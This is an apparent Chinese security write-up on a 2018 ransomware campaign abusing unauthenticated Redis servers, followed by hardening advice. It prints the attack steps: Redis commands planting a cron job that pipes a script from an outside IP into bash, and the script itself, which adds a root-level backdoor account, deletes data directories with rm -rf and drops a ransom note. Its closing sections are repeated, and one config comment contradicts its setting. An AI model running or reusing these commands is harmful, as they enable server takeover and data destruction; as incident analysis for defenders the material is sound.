Redis未授权访问漏洞与勒索事件深度分析<\/h1>

事件概述<\/h2>
2018年9月10日下午15:06，阿里云安全团队首次发现一起规模化利用Redis未授权访问漏洞进行加密货币勒索的安全事件。攻击者直接删除服务器数据并勒索比特币，与以往仅利用算力挖矿的攻击不同，此次攻击性质更为恶劣。<\/p>

Redis简介<\/h2>

Redis是一个开源的、基于内存的键值数据库，特点包括：<\/p>

使用ANSI C语言编写<\/li>
支持网络访问<\/li>
可持久化数据<\/li>
提供多种语言API<\/li>

由VMware(2010-2013)和Pivotal(2013后)赞助开发<\/li> <\/ul>

漏洞原理<\/h2>

Redis作为内存数据库，可通过配置或save<\/code>命令将数据写入磁盘。当Redis进程权限过高且未设置访问控制时，攻击者可利用未授权访问漏洞：<\/p>


写入计划任务(cron)<\/li>
写入SSH登录密钥<\/li>
写入Webshell<\/li>
执行任意系统命令<\/li>
<\/ol>
自2017年12月以来，该漏洞已被多个僵尸网络(如DDG)大规模利用，用于抢占服务器算力。<\/p>
攻击过程分析<\/h2>

扫描阶段<\/strong>：攻击者扫描公网暴露且未设置密码的Redis服务<\/li>
入侵阶段<\/strong>：通过Redis命令写入恶意计划任务
config set dir \/var\/spool\/cron\/
<\/span><\/span>config set dbfilename root
<\/span><\/span>config 1<\/span> *\/10 * * * * curl -s http:\/\/103.224.80.52\/butterfly.sh | bash
<\/span><\/span>save
<\/span><\/span><\/code><\/pre><\/li>
恶意脚本<\/strong>(butterfly.sh<\/code>)内容：
# 创建高权限账户<\/span>
<\/span><\/span>userdel -r redis
<\/span><\/span>useradd -o -u 0<\/span> -g 0<\/span> redis &>\/dev\/null
<\/span><\/span>echo "abcd-1234-!"<\/span> | passwd --stdin redis &>\/dev\/null
<\/span><\/span>
<\/span><\/span># 删除关键数据<\/span>
<\/span><\/span>rm -rf \/root\/*
<\/span><\/span>rm -rf \/home\/*
<\/span><\/span>rm -rf \/opt\/*
<\/span><\/span>rm -rf \/data\/*
<\/span><\/span>rm -rf \/data*
<\/span><\/span>
<\/span><\/span># 创建勒索信息<\/span>
<\/span><\/span>mkdir -p \/data
<\/span><\/span>echo -e "\nWarning! \nYour File and DataBase is downloaded and backed up..."<\/span> > \/root\/Warning.txt
<\/span><\/span>chmod +x \/root\/Warning.txt
<\/span><\/span>cp \/root\/Warning.txt \/Warning.txt
<\/span><\/span>cp \/root\/Warning.txt \/data\/Warning.txt
<\/span><\/span><\/code><\/pre><\/li>
勒索信息<\/strong>：

要求支付0.6 BTC到地址：3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny<\/code><\/li>
联系邮箱：dbsecuritys@protonmail.com<\/code><\/li>
威胁24小时后删除"备份"(实际未备份)<\/li>
<\/ul>
<\/li>
<\/ol>
事件影响<\/h2>
截至2018年9月10日晚8点，攻击者比特币地址已收到0.6 BTC转账，表明已有受害者支付赎金。<\/p>
安全防护建议<\/h2>
1. 网络层防护<\/h3>

通过安全组限制公网对Redis端口的访问(默认6379)<\/li>
仅允许可信IP访问Redis服务<\/li>
<\/ul>
2. Redis配置加固<\/h3>

修改redis.conf<\/code>配置文件：
# 启用认证
requirepass 复杂密码

# 重命名危险命令
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command SHUTDOWN ""

# 绑定特定IP
bind 127.0.0.1

# 禁用protected-mode
protected-mode yes
<\/code><\/pre>
<\/li>
<\/ul>
3. 系统层防护<\/h3>

以低权限用户运行Redis服务
useradd -r -s \/bin\/false redis
<\/span><\/span>chown -R redis:redis \/var\/lib\/redis
<\/span><\/span><\/code><\/pre><\/li>
限制Redis数据目录权限
chmod 700<\/span> \/var\/lib\/redis
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
4. 监控与响应<\/h3>

监控异常计划任务<\/li>
监控Redis日志中的可疑连接<\/li>
建立数据备份机制，避免数据完全丢失<\/li>
<\/ul>
总结<\/h2>
Redis未授权访问漏洞危害严重，可导致数据完全丢失和服务器被控。管理员应高度重视中间件安全配置，遵循最小权限原则，并建立完善的数据备份策略。此次事件也警示我们，面对勒索攻击时需谨慎验证攻击者是否真的持有数据备份。<\/p>

Redis未授权访问漏洞与勒索事件深度分析<\/h1>

事件影响<\/h2> 截至2018年9月10日晚8点，攻击者比特币地址已收到0.6 BTC转账，表明已有受害者支付赎金。<\/p>

安全防护建议<\/h2>

事件影响<\/h2>
截至2018年9月10日晚8点，攻击者比特币地址已收到0.6 BTC转账，表明已有受害者支付赎金。<\/p>